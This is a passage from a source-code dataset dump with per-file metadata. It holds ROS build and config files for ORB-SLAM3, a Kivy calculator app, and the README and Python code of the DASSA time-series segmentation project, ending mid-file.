"text": "cmake_minimum_required(VERSION 2.8)\nproject(orb_slam3_ros)\n\nIF(NOT CMAKE_BUILD_TYPE)\n SET(CMAKE_BUILD_TYPE Release)\nENDIF()\n\nMESSAGE(\"Build type: \" ${CMAKE_BUILD_TYPE})\n\nset(CMAKE_C_FLAGS \"${CMAKE_C_FLAGS} -Wall -O3\")\nset(CMAKE_CXX_FLAGS \"${CMAKE_CXX_FLAGS} -Wall -O3\")\nset(CMAKE_C_FLAGS_RELEASE \"${CMAKE_C_FLAGS_RELEASE} -march=native\")\nset(CMAKE_CXX_FLAGS_RELEASE \"${CMAKE_CXX_FLAGS_RELEASE} -march=native\")\n\n# set(CMAKE_C_FLAGS \"${CMAKE_C_FLAGS} -Wall -Wno-deprecated -O3 -march=native \")\n# set(CMAKE_CXX_FLAGS \"${CMAKE_CXX_FLAGS} -Wall -Wno-deprecated -O3 -march=native\")\n\n# Check C++11 or C++0x support\ninclude(CheckCXXCompilerFlag)\nCHECK_CXX_COMPILER_FLAG(\"-std=c++11\" COMPILER_SUPPORTS_CXX11)\nCHECK_CXX_COMPILER_FLAG(\"-std=c++0x\" COMPILER_SUPPORTS_CXX0X)\nif(COMPILER_SUPPORTS_CXX11)\n set(CMAKE_CXX_FLAGS \"${CMAKE_CXX_FLAGS} -std=c++11\")\n add_definitions(-DCOMPILEDWITHC11)\n message(STATUS \"Using flag -std=c++11.\")\nelseif(COMPILER_SUPPORTS_CXX0X)\n set(CMAKE_CXX_FLAGS \"${CMAKE_CXX_FLAGS} -std=c++0x\")\n add_definitions(-DCOMPILEDWITHC0X)\n message(STATUS \"Using flag -std=c++0x.\")\nelse()\n message(FATAL_ERROR \"The compiler ${CMAKE_CXX_COMPILER} has no C++11 support. Please use a different C++ compiler.\")\nendif()\n\nLIST(APPEND CMAKE_MODULE_PATH ${ROOT_DIR}/cmake_modules)\n\nfind_package(OpenCV 4.2)\nif(NOT OpenCV_FOUND)\n find_package(OpenCV 2.4.3 QUIET)\n if(NOT OpenCV_FOUND)\n message(FATAL_ERROR \"OpenCV > 2.4.3 not found.\")\n endif()\nendif()\n\nMESSAGE(\"OPENCV VERSION:\")\nMESSAGE(${OpenCV_VERSION})\n\nfind_package (catkin REQUIRED COMPONENTS\nroscpp\nrospy\nstd_msgs\ncv_bridge\nimage_transport\ntf\nsensor_msgs\ndynamic_reconfigure\nmessage_generation\n)\n\nfind_package(Eigen3 3.1.0 REQUIRED)\nfind_package(Pangolin REQUIRED)\n\nfind_package(Eigen3 3.1.0 REQUIRED)\n\nset (DYNAMIC_RECONFIGURE_PATH config/dynamic_reconfigure.cfg)\nexecute_process(COMMAND chmod a+x ${DYNAMIC_RECONFIGURE_PATH}\n WORKING_DIRECTORY ${PROJECT_SOURCE_DIR}\n RESULT_VARIABLE cmd_result\n OUTPUT_VARIABLE cmd_ver)\nmessage(STATUS \"Chmod a+x the dynamic_reconfigure file\")\n\ngenerate_dynamic_reconfigure_options(\n ${DYNAMIC_RECONFIGURE_PATH}\n)\n\nadd_service_files(\n FILES\n SaveMap.srv\n)\n\ngenerate_messages(\n DEPENDENCIES\n std_msgs\n)\n\nset(ROOT_DIR /home/ubuntu/ORB-SLAM3)\n\ninclude_directories(\ninclude\n${ROOT_DIR}\n${ROOT_DIR}/include\n${ROOT_DIR}/include/CameraModels\n${EIGEN3_INCLUDE_DIR}\n${Pangolin_INCLUDE_DIRS}\n${catkin_INCLUDE_DIRS}\n)\n\ncatkin_package (\n CATKIN_DEPENDS roscpp rospy std_msgs cv_bridge image_transport tf sensor_msgs dynamic_reconfigure message_runtime\n LIBRARIES {PROJECT_NAME} libDBoW2 libg2o\n)\n\nset(ORB_SLAM3 ${ROOT_DIR}/lib/libORB_SLAM3.so)\n\n# Build examples\n\n#add_executable (${PROJECT_NAME}_mono\n#src/MonoNode.cc\n#src/Node.cc\n#)\n#add_dependencies (${PROJECT_NAME}_mono ${PROJECT_NAME} ${PROJECT_NAME}_gencfg)\n\nset(LIBS\n ${ORB_SLAM3}\n ${catkin_LIBRARIES}\n ${EIGEN3_LIBS}\n ${Pangolin_LIBRARIES}\n ${ROOT_DIR}/Thirdparty/DBoW2/lib/libDBoW2.so\n ${ROOT_DIR}/Thirdparty/g2o/lib/libg2o.so\n -lboost_serialization\n -lcrypto\n)\n\n# Node for monocular camera\nadd_executable(Mono\nsrc/ros_mono.cc\n)\n\ntarget_link_libraries(Mono\n${LIBS}\n)\n\n# Node for stereo camera\nadd_executable(Stereo\nsrc/ros_stereo.cc\n)\n\ntarget_link_libraries(Stereo\n${LIBS}\n)\n\n# Node for RGB-D camera\nadd_executable(RGBD\nsrc/ros_rgbd.cc\n)\n\ntarget_link_libraries(RGBD\n${LIBS}\n)\n\n# Node for monocular-inertial 
camera\nadd_executable(Mono_Inertial\nsrc/ros_mono_inertial.cc\n)\n\ntarget_link_libraries(Mono_Inertial\n${LIBS}\n)\n\n# Node for stereo-inertial camera\nadd_executable(Stereo_Inertial\nsrc/ros_stereo_inertial.cc\n)\n\ntarget_link_libraries(Stereo_Inertial\n${LIBS}\n)\n"
},
{
"alpha_fraction": 0.4848484992980957,
"alphanum_fraction": 0.5454545617103577,
"avg_line_length": 23.75,
"blob_id": "bb9cb39af15e641d61e9011ba48f238d276615f0",
"content_id": "9d507ae0d39ff6031143cd617b3cde166bd7acc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 99,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 4,
"path": "/docs/search/namespaces_0.js",
"repo_name": "National-Innovation-Center-Nepal/orb_slam_3_ros",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['orb_5fslam3_9',['ORB_SLAM3',['../namespace_o_r_b___s_l_a_m3.html',1,'']]]\n];\n"
},
{
"alpha_fraction": 0.5501222610473633,
"alphanum_fraction": 0.567237138748169,
"avg_line_length": 61.92307662963867,
"blob_id": "f97aab453a6732c42523e75b301b94548b0b6ce9",
"content_id": "b735195b016a7ea3d8e5d8499557bbf6324a6bcf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 818,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 13,
"path": "/config/dynamic_reconfigure.cfg",
"repo_name": "National-Innovation-Center-Nepal/orb_slam_3_ros",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nPACKAGE = \"orb_slam3_ros\"\n\nfrom dynamic_reconfigure.parameter_generator_catkin import *\n\ngen = ParameterGenerator()\n\ngen.add(\"localize_only\", bool_t, 0, \"Disable mapping, localize only\", False)\ngen.add(\"reset_map\", bool_t, 0, \"Erase the map; toggles back to false automatically\", False)\ngen.add(\"min_num_kf_in_map\", int_t, 0, \"Minimum number of key frames in the map for initialization\", 5, 1, 50)\ngen.add(\"min_observations_for_ros_map\", int_t, 0, \"Min num of observations per point for the point cloud; Doesn't change the SLAM itself\", 4, 2, 30)\n\nexit(gen.generate(PACKAGE, \"orb_slam3_ros\", \"dynamic_reconfigure\"))\n"
}
] | 9 |
alienobserver/Calculator | https://github.com/alienobserver/Calculator | 9da297c78da9799690abb3bbc7e74e5cc8bc4efd | 9a3cfb53442a155c0976054cb25d28a8468cb928 | 8c56af354800ed7ded1960f8d331573426bd5848 | refs/heads/main | 2023-04-24T01:48:53.561779 | 2021-05-04T13:00:00 | 2021-05-04T13:00:00 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.600669264793396,
"alphanum_fraction": 0.6101505756378174,
"avg_line_length": 43,
"blob_id": "5e53ffd49cab7ac4a2f1ae2f5f9150d3ed6dc1ea",
"content_id": "c38e622ecd6dcf2fc65dba1364c55cd9eb4a3e89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7176,
"license_type": "no_license",
"max_line_length": 177,
"num_lines": 163,
"path": "/calculator.py",
"repo_name": "alienobserver/Calculator",
"src_encoding": "UTF-8",
"text": "# Calculator App\n# install python kivy with $ pip install kivy\n\nfrom kivy.app import App\nfrom kivy.config import Config\n\n# Size of app\nwidth = 350\nheight = 500\n\nConfig.set( 'graphics', 'resizable' , False )\nConfig.set( 'graphics', 'width' , width )\nConfig.set( 'graphics', 'height' , height )\n\nfrom kivy.uix.button import Button\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.label import Label\nfrom kivy.core.window import Window\n\nfrom math import sqrt, sin, cos, tan, radians\nfrom mpmath import cot, pi\nimport os, sys\n\nWindow.clearcolor = (0.1, 0.1, 0.1, 1)\n\n# sin, cos, tan, cot function for degrees\ndef sinA(deg):\n return sin(radians(deg))\n\ndef cosA(deg):\n return cos(radians(deg))\n\ndef tanA(deg):\n return tan(radians(deg))\n\ndef cotA(deg):\n return cot(radians(deg))\n\n# The main class\nclass CalculatorApp(App):\n # calculate the result in label if theres an error return message\n def calc_result(self, instance):\n try:\n self.lb.text = str(eval(self.lb.text))\n\n except ZeroDivisionError:\n self.formula = \"Can\\'t divide by 0\"\n self.lb.text = self.formula\n\n except SyntaxError:\n self.formula = \"Wrong Expression\"\n self.lb.text = self.formula\n\n except ValueError:\n self.formula = \"Wrong Expression\"\n self.lb.text = self.formula\n\n else:\n self.formula = \"0\"\n\n def update_label(self):\n self.lb.text = self.formula\n\n def add_number(self, instance):\n # Clear the label before adding nums\n if self.formula == \"0\" or self.formula == \"Wrong Expression\" or self.formula == \"Can\\'t divide by 0\":\n self.formula = \"\"\n\n self.formula += str(instance.text)\n self.update_label()\n\n def add_operation(self, instance):\n # Clear the label before adding opers\n if self.formula == \"0\" or self.formula == \"Wrong Expression\" or self.formula == \"Can\\'t divide by 0\":\n self.formula = \"\"\n\n # Translate the needed words to functions\n if str(instance.text).lower() == \"x\":\n self.formula += '*'\n\n elif str(instance.text).lower() == \"^\":\n self.formula += '**'\n\n elif str(instance.text).lower() == \"√\":\n self.formula += 'sqrt('\n\n elif str(instance.text).lower() == \"sin\":\n self.formula += 'sinA('\n\n elif str(instance.text).lower() == \"cos\":\n self.formula += 'cosA('\n\n elif str(instance.text).lower() == \"tan\":\n self.formula += 'tanA('\n\n elif str(instance.text).lower() == \"cot\":\n self.formula += 'cotA('\n\n else:\n self.formula += str(instance.text)\n\n self.update_label()\n\n def clear(self, instance):\n self.formula = \"0\"\n\n def build(self):\n # Setting icon's path\n self.icon = (os.path.abspath(os.path.dirname(sys.argv[0])) + \"/keys.png\").replace(\"\\\\\", \"/\")\n self.formula = \"0\"\n self.colNums = [0.2, 0.2, 0.2, 1]\n self.colOpers = [0.15, 0.15, 0.15, 1]\n\n #The main Box Layout\n bl = BoxLayout( orientation = 'vertical', padding = [3] )\n\n # The main gridlayout where are all buttons\n gl = GridLayout( cols = 5, spacing = 3, size_hint = (1, .6) )\n\n # The main label\n self.lb = Label( text = \"0\",font_size = 30, halign = \"right\", valign = \"center\", size_hint = (1, .4), text_size = (width - 50, height * .4 - 50) , color = [1, 1, 1, 1] )\n\n # Add The GridLayout and The label to The BoxLayout \n bl.add_widget( self.lb )\n bl.add_widget( gl )\n\n # Setting all buttons and adding them to the gridlayout\n gl.add_widget( Button( text = \"√\", on_press = self.add_operation, background_color = self.colOpers , 
background_normal = '' ) )\n gl.add_widget( Button( text = \"^\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n gl.add_widget( Button( text = \"(\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n gl.add_widget( Button( text = \")\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n gl.add_widget( Button( text = \"CE\", on_press = self.clear, background_color = self.colOpers , background_normal = '' ) )\n\n gl.add_widget( Button( text = \"7\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"8\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"9\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"X\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n gl.add_widget( Button( text = \"sin\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n\n gl.add_widget( Button( text = \"4\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"5\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"6\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"-\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n gl.add_widget( Button( text = \"cos\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n\n gl.add_widget( Button( text = \"1\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"2\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"3\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"+\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n gl.add_widget( Button( text = \"tan\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n\n gl.add_widget( Button( text = \"=\", on_press = self.calc_result, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"0\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \".\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"/\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n gl.add_widget( Button( text = \"cot\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n\n return bl\n\nif __name__ == \"__main__\":\n CalculatorApp().run()\n"
},
{
"alpha_fraction": 0.748633861541748,
"alphanum_fraction": 0.748633861541748,
"avg_line_length": 13.076923370361328,
"blob_id": "b218f55e8e7e37df65dcd3e67d998aa28faafd6f",
"content_id": "583b09dc338112606c66bd79dfe8e8f4a35aab11",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 183,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 13,
"path": "/README.md",
"repo_name": "alienobserver/Calculator",
"src_encoding": "UTF-8",
"text": "# Calculator\nA simple calculator created with Python and Kivy\n\nTo install kivy run\n```sh\npip install kivy\n```\n\nTo run the application run\n```sh\ncd Calculator\npython calculator.py\n```\n"
}
] | 2 |
SorourAmiri/DASSA | https://github.com/SorourAmiri/DASSA | cf64790f09407d3e023bb2caa7a7c902d4b6c43e | 648872e3b77844e54f8a124464cd77fffb4cd366 | 1676668fa0f54df0609beca1f000c0b6a14381e2 | refs/heads/master | 2018-12-18T14:52:59.126474 | 2018-09-14T17:20:46 | 2018-09-14T17:20:46 | 119,204,466 | 3 | 4 | null | null | null | null | null | [
{
"alpha_fraction": 0.5963523983955383,
"alphanum_fraction": 0.6648313999176025,
"avg_line_length": 26.40566062927246,
"blob_id": "4e6a04ca774c01a9dab43d9d62db3f0ab3432f1a",
"content_id": "208ada5bcfbb37874ec0de6aee36bf8c1334af37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2906,
"license_type": "no_license",
"max_line_length": 223,
"num_lines": 106,
"path": "/README.md",
"repo_name": "SorourAmiri/DASSA",
"src_encoding": "UTF-8",
"text": "Automatic Segmentation of General Time-Stamped Data Sequences (AAAI 2018)\n==========================================================================\n\nAuthors: Liangzhe Chen, Sorour E. Amiri, and B. Aditya Prakash\n\nDate: March, 2018\n\nCiting\n------\nIf you find DASSA useful in your research, we ask that you cite the following paper:\n```\n@inproceedings{DBLP:conf/aaai/ChenAP18,\n author = {Liangzhe Chen and\n Sorour E. Amiri and\n B. Aditya Prakash},\n title = {Automatic Segmentation of Data Sequences},\n booktitle = {Proceedings of the Thirty-Second {AAAI} Conference on Artificial Intelligence,\n New Orleans, Louisiana, USA, February 2-7, 2018},\n year = {2018},\n crossref = {DBLP:conf/aaai/2018},\n url = {https://www.aaai.org/ocs/index.php/AAAI/AAAI18/paper/view/17300},\n timestamp = {Thu, 03 May 2018 17:03:19 +0200},\n biburl = {https://dblp.org/rec/bib/conf/aaai/ChenAP18},\n bibsource = {dblp computer science bibliography, https://dblp.org}\n}\n```\n\nUsage:\n-----\nNote: You need to set the correct MATLAB_path in the makefile (Including the MATLAB executable).\n```\n- Example:\n MATLAB_path = '/Applications/MATLAB_R2016a.app/bin/matlab'\n``` \nTo run DASSA do as follows,\n```\n>> make demo \n```\n\n'make demo' will run the DASSA for toy example. \n\nYou can directly run DASSA with the following command:\n```\n>> python dassa.py <data_path> <matlab_path> <min_window> <num_of_clusters> <calc_mode>\n```\n\n- <data_path> : Directory of the dataset\n \n- <matlab_path>: Directory of MATLAB in your machine\n\n- <min_window>: Minimum desired length for segmentation (i.e., s_min)\n\n- <num_of_clusters>: Number of co-occurring clusters (It will be used if <calc mode> is 0)\n\n- <calc_mode>: 0/1 value. if <calc mode> is 0 DASSA directly use <num of clusters> as the number of co-occurring clusters. Otherwise it automatically detects the best number of clusters.\n\n```\n- Example: \n python dassa.py './data/test/' '/Applications/MATLAB_R2016a.app/bin/matlab' 172800 5 0\n```\n\n\n\nInput: \n------\n- input.txt is a tab separated file. Each row represents a multidimensional observation. Each column is the value of each dimension, and the last column in each row represents the timestamp of the corresponding observation.\n\nThe input.txt file for dassa.py looks like as follows:\n\n```\nf11 f12 f13 f14 ... f1n t1\nf21 f22 f23 f24 ... f2n t2\nf31 f32 f33 f34 ... f3n t3\n.\n.\n.\n```\n\n\n\nOutput:\n-------\n\n- Segmentation.txt: It shows the final segmentation result. For example,\n```\n'628490000.0-630390000.0', '630390000.0-630560000.0', '630560000.0-633760000.0'\n```\n\nIt means DASSA detects a cut point at time 630390000.0 and 630560000.0 in the time interval [628490000.0-633760000.0]\n\n- Intermediate results:\nThe following are the intermediate files of the above example:\n\n Xtilde.txt\n \n BeginEndTime.txt\n \n P_Xtilde_Y.txt\n \n X.txt\n \n Y.txt\n \n Ytilde.txt\n \n ALP_runnimgtime.txt\n\n"
},
{
"alpha_fraction": 0.5177218914031982,
"alphanum_fraction": 0.5298394560813904,
"avg_line_length": 30.150943756103516,
"blob_id": "0026b753f752f4a9ac844f7237de23f0f7468f54",
"content_id": "a22d49d7a85bdc688ba7c8af00d0f58c6647afe6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3301,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 106,
"path": "/ALP.py",
"repo_name": "SorourAmiri/DASSA",
"src_encoding": "UTF-8",
"text": "__author__ ='Sorour E.Amiri'\n\nimport networkx as nx\nimport sys\nimport operator\nimport multiprocessing as mp\n\n\ndef generate_test_input():\n graph = {}\n graph['Source'] = {}\n graph['a'] = {}\n graph['b'] = {}\n graph['c'] = {}\n graph['d'] = {}\n graph['e'] = {}\n graph['f'] = {}\n graph['Target'] = {}\n graph['Source']['a'] = 3\n graph['Source']['d'] = 2\n graph['Source']['f'] = 10\n graph['a']['b'] = 2\n graph['a']['e'] = 7\n graph['d']['c'] = 4\n graph['f']['Target'] = 9\n graph['b']['c'] = 5\n graph['e']['Target'] = 8\n graph['c']['Target'] = 6\n return graph, 'Source', 'Target', 4\n\n\ndef make_dag(graph):\n dag = nx.DiGraph()\n for key1 in graph.keys():\n for key2 in graph[key1].keys():\n dag.add_weighted_edges_from([(key1, key2, graph[key1][key2])])\n return dag\n\n\ndef main(graph, source, target, max_length):\n alp_list = []\n dag = make_dag(graph)\n tree = nx.DiGraph()\n tree_nodes = {}\n tree_levels = {}\n level = 0\n predecessor = 'null'\n weight = 0\n c = 2\n tree_levels[level] = [source]\n tree_nodes[source] = {}\n tree_nodes[source][level] = (predecessor, weight)\n tree.add_node((source, level))\n\n for level in range(max_length + 1):\n tree_levels[level + 1] = []\n for nodes in tree_levels[level]:\n pi, p_weight = tree_nodes[nodes][level]\n for successor in dag.successors(nodes):\n # edge_weight = dag[nodes][successor]['weight']\n # tree.add_weighted_edges_from(((nodes, level), (successor, level + 1), edge_weight))\n # weight = p_weight + dag.edge[nodes][successor]['weight']\n weight = p_weight + dag.succ[nodes][successor]['weight']\n try:\n curr_pi, curr_weight = tree_nodes[successor][level + 1]\n if curr_weight < weight:\n tree_nodes[successor][level + 1] = (nodes, weight)\n except KeyError:\n try:\n temp = tree_nodes[successor]\n except KeyError:\n tree_nodes[successor] = {}\n\n tree_nodes[successor][level + 1] = (nodes, weight)\n tree_levels[level + 1].append(successor)\n try:\n t_pi, t_weight = tree_nodes[target][level]\n alp_list.append(t_weight / float(level - c))\n except KeyError:\n alp_list.append(0)\n\n # alp_list = [lp_list[i] / float(i) for i in range(1, len(lp_list))]\n\n max_index, max_value = max(enumerate(alp_list), key=operator.itemgetter(1))\n\n # get the path\n # nx.all_simple_paths(tree, source=(source, 0), target=(target, max_index))\n pi, p_weight = tree_nodes[target][max_index]\n level = max_index - 1\n path = []\n while not level == 0:\n path.append(pi)\n pi, p_weight = tree_nodes[pi][level]\n level -= 1\n path.reverse()\n return path, max_value, max_index - c\n\n\nif __name__ == '__main__':\n graph = sys.argv[1]\n source = sys.argv[2]\n target = sys.argv[3]\n max_length = sys.argv[4]\n # graph, source, target, max_length = generate_test_input()\n path, path_weight, path_length = main(graph, source, target, max_length)\n print(path, path_weight, path_length)"
},
{
"alpha_fraction": 0.5163360834121704,
"alphanum_fraction": 0.5351822972297668,
"avg_line_length": 29.918575286865234,
"blob_id": "c10e3fb642a33ed27d1480ecd23da8d50cd0f400",
"content_id": "693b53a3d4f74eda115f416bc05286073ff4fd8d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12151,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 393,
"path": "/dassa.py",
"repo_name": "SorourAmiri/DASSA",
"src_encoding": "UTF-8",
"text": "___author__='Sorour Ekhtiari Amiri & Liangzhe Chen'\n__email__='[email protected]'\n\nimport numpy as np\nimport math\nfrom collections import defaultdict\nimport sys\nimport os\nimport ALP as falp\nimport time\nimport subprocess\n\n\ndef aib(data_dir, MinW, N_mdl, CalcMode, _dir, matlab_path):\n matlab_function = \"AIB('\" + _dir + \"', '\" + data_dir + \"', '\" + str(MinW) + \"', '\" + str(N_mdl) + \"', '\" + \\\n str(CalcMode) + \"')\"\n subprocess.call([matlab_path, \"-nosplash\", \"-nodisplay\", \"-r\", matlab_function])\n\n\ndef toposort(graph):\n print('toposort...')\n \"\"\"http://code.activestate.com/recipes/578272-topological-sort/\n\n Dependencies are expressed as a dictionary whose keys are items\nand whose values are a set of dependent items. Output is a list of\nsets in topological order. The first set consists of items with no\ndependences, each subsequent set consists of items that depend upon\nitems in the preceeding sets.\n\n>>> print '\\\\n'.join(repr(sorted(x)) for x in toposort2({\n... 2: set([11]),\n... 9: set([11,8]),\n... 10: set([11,3]),\n... 11: set([7,5]),\n... 8: set([7,3]),\n... }) )\n[3, 5, 7]\n[8, 11]\n[2, 9, 10]\n\n\"\"\"\n from functools import reduce\n data = defaultdict(set)\n for x, y in graph.items():\n for z in y:\n data[z[0]].add(x)\n\n # Ignore self dependencies.\n for k, v in data.items():\n v.discard(k)\n # Find all items that don't depend on anything.\n extra_items_in_deps = reduce(set.union, data.values()) - set(data.keys())\n # Add empty dependences where needed\n data.update({item:set() for item in extra_items_in_deps})\n while True:\n ordered = set(item for item, dep in data.items() if not dep)\n if not ordered:\n break\n yield ordered\n data = {item: (dep - ordered)\n for item, dep in data.items()\n if item not in ordered}\n assert not data, \"Cyclic dependencies exist among these items:\\n%s\" % '\\n'.join(repr(x) for x in data.items())\n\n\ndef longestpathDAG(graph, startnode, endnode):\n print('longsetpath...')\n \"\"\"http://www.geeksforgeeks.org/find-longest-path-directed-acyclic-graph/\"\"\"\n ### TOPOLOGICALLY SORT THE VERTICES\n order = []\n for part in toposort(graph):\n order.extend(list(part))\n # order.reverse()\n\n ### INITIALIZE DISTANCE MATRIX\n LOWDIST=-99999999999999999\n dist = dict((x, LOWDIST) for x in graph.keys())\n dist[startnode] = 0\n\n ### MAIN PART\n comesfrom = dict()\n for node in order: # u\n for nbr, t1, t2, t3, nbrdist in graph[node]: # v\n if dist[nbr] < dist[node] + nbrdist :\n dist[nbr] = dist[node] + nbrdist\n comesfrom[nbr] = node\n\n ### BACKTRACKING FOR MAXPATH\n maxpath = [endnode]\n while maxpath[-1] != startnode:\n maxpath.append(comesfrom[maxpath[-1]])\n maxpath.reverse()\n Length = len(maxpath)\n return dist[endnode], maxpath[1:Length-1]\n\n\ndef Convert(ALP_arr, Y, dir_, FName):\n End = len(Y[0]) - 1\n F = dir_ + FName\n with open(F,'w')as f:\n # f.write('Segmentation :' + '\\n')\n # f.write(\"['Source',\")\n for i in ALP_arr:\n f.write(\"'\" + str(float(Y[int(i)][End - 1])) + '-' + str(float(Y[int(i)][End])) + \"'\" + ',')\n # f.write(\"'Target']\" + '\\n')\n f.close()\n\n\ndef Finding_Neigbours(YID, Y, node):\n Neigbours = []\n # YID.remove(node)\n End = len(Y[0]) -1\n E1 = Y[node][End]\n for item in YID:\n B2 = Y[item][End-1]\n if (E1 == B2):\n Neigbours.append(item)\n return Neigbours\n\n\ndef get_distance(node1, node2, P_Xtilde_Y):\n V1 = node1\n V2 = node2\n if len(P_Xtilde_Y) > 1:\n a = P_Xtilde_Y[:, V1]\n b = P_Xtilde_Y[:, V2]\n else:\n a = P_Xtilde_Y[0][V1]\n b = 
P_Xtilde_Y[0][V2]\n dist = 0\n for i in range(len(a)):\n dist = (a[i] - b[i])**2\n\n dist **= 0.5\n return dist\n\n\ndef Datapointnumber(End, Begin, Timestamp, EEnd):\n if End != EEnd:\n members = Timestamp[np.where((Timestamp >= Begin) & (Timestamp < End))]\n else:\n members = Timestamp[np.where((Timestamp >= Begin) & (Timestamp <= End))]\n number = len(members)\n return number\n\n\ndef get_quality(Distance, Min_n, Std, Mean, Total, method, fun, Frac):\n epsilon = 0.0001\n if method == 'Fraction':\n if fun == 'Sharp':\n if Min_n< (Frac* Total): #Mean - (2*Std):\n quality = min(Distance,epsilon)\n else:\n quality = Distance\n else:\n #print Min_n,Frac,Total\n try:\n quality = Distance / (1+math.exp(-Min_n+(Frac * Total)))\n except OverflowError:\n quality = 0.0\n else: # if method = 'Sigma':\n if fun == 'Sharp':\n if (Min_n< (Mean - (2*Std))): #:\n quality = min(Distance,epsilon)\n else:\n quality = Distance\n else:\n quality = (Distance / (1+math.exp(-Min_n+(Mean - (2*Std)))))\n return quality\n\n\ndef generate_graph(P_Xtilde_Y,Timestamp,Y,BeginTime,EndTime,method,fun,Frac):\n print('generate_graph...')\n G={}\n N_points_arr = {}\n End = len(Y[0])-1\n YID = range(0,len(Y))\n Source = 'Source' #len(Y)\n Target = 'Target' #len(Y) + 1\n G[Source] = []\n G[Target] = []\n TotalW = 0\n Totale = 0\n for node1 in YID:\n size1 = Y[node1][End]- Y[node1][End-1]\n number1 = Datapointnumber(Y[node1][End],Y[node1][End-1],Timestamp,EndTime)\n\n try:\n N_points_arr[size1].append(number1)\n except KeyError:\n N_points_arr[size1] = [number1]\n\n Neigbours = Finding_Neigbours(YID,Y,node1)\n ## Adding 2 extra nodes\n if (Y[node1][End] == EndTime) & (Y[node1][End-1] == BeginTime):\n continue\n if Y[node1][End] == EndTime:\n try:\n G[node1].append((Target,0,0,0,0))\n except KeyError:\n G[node1] = [(Target,0,0,0,0)]\n if Y[node1][End-1] == BeginTime:\n try:\n G[Source].append((node1,0,0,0,0))\n except KeyError:\n G[Source] = [(node1,0,0,0,0)]\n #################################################\n for node2 in Neigbours:\n size2 = Y[node2][End]- Y[node2][End-1]\n number2 = Datapointnumber(Y[node2][End],Y[node2][End-1],Timestamp,EndTime)\n\n\n if number1<=number2:\n Min_n = number1\n Min_s = size1\n else:\n Min_n = number2\n Min_s = size2\n Distance = get_distance(node1,node2,P_Xtilde_Y)\n quality = 0\n\n Weight = Distance\n TotalW += Weight\n Totale +=1\n try:\n G[node1].append((node2,Weight,Min_n,Min_s,quality))\n except KeyError:\n G[node1] = [(node2,Weight,Min_n,Min_s,quality)]\n Mean = {}\n Std = {}\n Graph = {}\n for Key in N_points_arr.keys():\n Mean[Key] = np.array(N_points_arr[Key]).mean()\n Std[Key] = np.array(N_points_arr[Key]).std()\n Total = Datapointnumber(EndTime,BeginTime,Timestamp,EndTime)\n for Key in G.keys():\n for i in range(0,len(G[Key])):\n node2,Weight,Min_n,Min_s,quality = G[Key][i]\n if Min_s> 0:\n quality = get_quality(Weight,Min_n,Std[Min_s],Mean[Min_s],Total,method,fun,Frac)\n G[Key][i] = (node2,Weight,Min_n,Min_s,quality)\n for Key in G.keys():\n for node2,Weight,Min_n,Min_s,quality in G[Key]:\n try:\n Graph[Key][node2] = quality\n except KeyError:\n Graph[Key] = {}\n Graph[Key][node2] = quality\n Graph['Target']={}\n return Graph,G,(float(TotalW)/Totale)\n\n\ndef Calc_Weights(G,maxpath):\n Weight = []\n for i in range(0,len(maxpath)-1):\n for (x,t1,t2,t3,y) in G[maxpath[i]]:\n if (x == maxpath[i+1]):\n Weight.append(y)\n return Weight\n\n\ndef ReadData(data_dir):\n print('ReadData')\n PFile = data_dir + 'P_Xtilde_Y.txt'\n P_Xtilde_Y = []\n with open(PFile) as f:\n 
